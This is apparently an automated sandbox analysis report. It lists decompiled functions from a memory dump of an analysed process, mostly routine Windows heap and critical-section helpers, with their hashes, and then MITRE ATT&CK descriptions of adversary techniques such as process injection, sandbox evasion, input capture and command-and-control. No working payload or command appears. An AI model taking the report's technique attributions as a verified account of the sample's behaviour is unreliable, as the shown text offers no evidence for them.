Opcode ID: b413e58f610cf5833a59bb331fa4691bd4afe84778ddfce9e3df60da6b0beb7e
Instruction ID: bd8684fa08cdb329a295888fbe303a3de6869bab74965abde31787d4fa91274c
Opcode Fuzzy Hash: b413e58f610cf5833a59bb331fa4691bd4afe84778ddfce9e3df60da6b0beb7e
Instruction Fuzzy Hash: ACF01C78560700CFEBA0FFB6950071C36A8F744398F4045A5A204A7294C77868E4CF35

Uniqueness

Uniqueness Score: -1.00%

Function 04C1D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04C1D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04B6E8B0(__ecx, _a4, 0xfff);
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x04c1d38a
0x04c1d39b
0x04c1d3b1
0x00000000
0x04c1d3b6
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 4bbb5dbea8844e73d5c9d875eeb8066bfd503acc4b60dd0369b6508d79d81a19
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 80E0C235280204BBEB226E44CC00F697B26DB407A4F204031FE095A6A0CA79FD91EAC4

Uniqueness

Uniqueness Score: -1.00%

Function 04B9A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B9A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4c567e4 >= 0xa) {
					if(_t5 < 0x4c56800 || _t5 >= 0x4c56900) {
						return L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04B80010(0x4c567e0, _t5);
				}
			}

0x04b9a190
0x04b9a1a6
0x04b9a1c2
0x00000000
0x00000000
0x00000000
0x04b9a192
0x04b9a192
0x04b9a19f
0x04b9a19f

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e20d1f58a81c79114123fcf5bd092f8b97b47135a5f664e4c08a2b43faad1bc
Instruction ID: 9c971de72cf61b75872785ae6e1c58ac492be6f57b1f3a14b626170d2739895e
Opcode Fuzzy Hash: 8e20d1f58a81c79114123fcf5bd092f8b97b47135a5f664e4c08a2b43faad1bc
Instruction Fuzzy Hash: 4BD0C2A122004016FB1C2720A854B292253E7C8758F70089CE10A1A5B0E950FCE4C10C

Uniqueness

Uniqueness Score: -1.00%

Function 04B916E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B916E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04B91710(0x4c567e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04B84620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x04b916e8
0x04b916ef
0x04b916f3
0x04b916fe
0x00000000
0x04b91700
0x04b9170d
0x04b9170d
0x04b916f2
0x04b916f2
0x04b916f2
0x04b916f2

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f747068e826bbc0bd1d24b9e1096ce8e31c173930391f3a15705278b7e2eabe
Instruction ID: ad2f6f8f18529d2a72ca2684ccca0acae23d128655973bec1efb63279fc0aabb
Opcode Fuzzy Hash: 4f747068e826bbc0bd1d24b9e1096ce8e31c173930391f3a15705278b7e2eabe
Instruction Fuzzy Hash: 71D0A77120010352FE2D5B189804B142292DB80789F3800FCF10B595D0DFB4FC92F44C

Uniqueness

Uniqueness Score: -1.00%

Function 04BE53CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04BE53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04B7EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x04be53ca
0x04be53ce
0x04be53d9
0x04be53de
0x04be53e1
0x04be53e1
0x04be53e6
0x04be53f3
0x00000000
0x04be53f8
0x04be53fb

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 42aa79ee7383a52235e5f7875953753151d0f9b4ad7ac96ce805e7ff0e3fc995
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 8EE08C31900780ABCF22EB89CA90F5EB7F5FB84B08F140088A0096B620CB24FC00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04B935A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B935A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04B7EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x04b935a1
0x04b935a1
0x04b935a5
0x04b935ab
0x04b935ab
0x04b935b5
0x00000000
0x04b935c1
0x04b935b7

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: ebc2b68698700a5c7f41032032cc2acc1b927a05ed513fd4b3d75df4a338d4fa
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 19D0C9315511849AEF91AB70C65876877F2FF0C318F5830F6984656962C33EAE5AD601

Uniqueness

Uniqueness Score: -1.00%

Function 04B7AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B7AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x04b7aab6
0x04b7aabb
0x04bca442
0x00000000
0x04bca448
0x04bca454
0x04bca454
0x04b7aac1
0x04b7aac1
0x04b7aac6
0x04b7aac6

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 82c0b86d932efe2b6cfd5879b4408877af042b7de7ee3bf6aa523f389c37eceb
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 32D0E935352980CFD756DF1DC594B1573A4FB48B44FC504D4E501CBB61E62CE945CA00

Uniqueness

Uniqueness Score: -1.00%

Function 04BEA537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04BEA537(intOrPtr _a4, intOrPtr _a8) {

				return L04B88E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x04bea553

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 2dc16ccf85df4551a92642cadf13e2011d867992a127a770e97d58d795a4e3e5
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 64C01236080248BBCB127E81CC00F067B2AFB94B60F008414BA080A5608632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 04B6DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B6DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04B84620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x04b6db4d
0x04b6db54
0x04b6db5f
0x04b6db56
0x04b6db56
0x04b6db5c
0x04b6db5c

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: e61ae3e0b09e751ed7a9e2c61b6152915928eaef83529d55a879524f3ac89dd2
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: FAC08C30380A02AAEB222F20CD01B0036A8FB40B05F4800E06301DA0F0EB7CE801EA00

Uniqueness

Uniqueness Score: -1.00%

Function 04B6AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B6AD30(intOrPtr _a4) {

				return L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04b6ad49

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 3192cd395205c3872ada706d621b0ebdd9f4fdf2d7d506b3f77d027ccb767a6c
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 78C08C32080248BBC7126A45CD00F017B29E790B60F100020B6040A6618932E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 04B776E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B776E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x04b776e4
0x00000000
0x04b776f8
0x04b776fd

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: de2d3023d1df44dd41b98cb80926b76aedcc82a8a3f6c2c9efc5a280bedc529e
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: ABC08C741411805AEB2A7B08CE60B203650EB0870CF5801DCAB21094A1CB68F823C288

Uniqueness

Uniqueness Score: -1.00%

Function 04B936CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B936CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x04b936d2
0x04b936e8
0x04b936d4
0x04b936e5
0x04b936e5

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 52d24b7ba7fd0332e8111f86334dad670314278b77d431f6d0a89e58d7e1b3aa
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 33C02B70154440FBEB252F30CD00F1476D4F700A21F6403E87220494F0F638BC00D500

Uniqueness

Uniqueness Score: -1.00%

Function 04B83A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B83A1C(intOrPtr _a4) {
				void* _t5;

				return L04B84620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04b83a35

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: d435da1d49adfec5117970170d4ee1b290e6d8a8abcdc2d323cb7123a61e4795
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 25C08C32080248BBC7126E41DC00F017B29E790B60F000060B6040A5609632EC60D988

Uniqueness

Uniqueness Score: -1.00%

Function 04B87D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B87D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x04b87d56
0x04b87d5b
0x04b87d60
0x04b87d5d
0x04b87d5d
0x04b87d5d

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 779520da5700cccc996b4c3ccf7ae64937654714c3ae0cf36f90fb5cd736807d
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: E2B092343019408FCF16EF18C480B1533E4FB44A44B9400D4E400CBA20D629E800DA00

Uniqueness

Uniqueness Score: -1.00%

Function 04B92ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B92ACB() {
				void* _t5;

				return E04B7EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x04b92adc

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 4be613d23846d95e3d506c2068ed39d3409d91da79ab2bed0205aca9119af034
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 8AB092328104408BCF02AB40CA50A197731AB00654F0544D1901127A208228AC01CA40

Uniqueness

Uniqueness Score: -1.00%

Function 04BFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04BFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04BACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04BF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04BF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04bffdda
0x04bffde2
0x04bffde5
0x04bffdec
0x04bffdfa
0x04bffdff
0x04bffe0a
0x04bffe0f
0x04bffe17
0x04bffe1e
0x04bffe19
0x04bffe19
0x04bffe19
0x04bffe20
0x04bffe21
0x04bffe22
0x04bffe25
0x04bffe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04BFFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04BFFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04BFFE2B

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: f24e4f935843956a19c418bf779a8cb5217de63ef7656d38eb3882d3bcc71d6e
Instruction ID: c205dfc45b5e97e2407b50c84e05972b00168ddf88327b1a20a7c0e98f8023b4
Opcode Fuzzy Hash: f24e4f935843956a19c418bf779a8cb5217de63ef7656d38eb3882d3bcc71d6e
Instruction Fuzzy Hash: FEF0F632640601BFE6241A45DC02F33BF6AEB44730F140395F728565E1EA62F8309BF4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
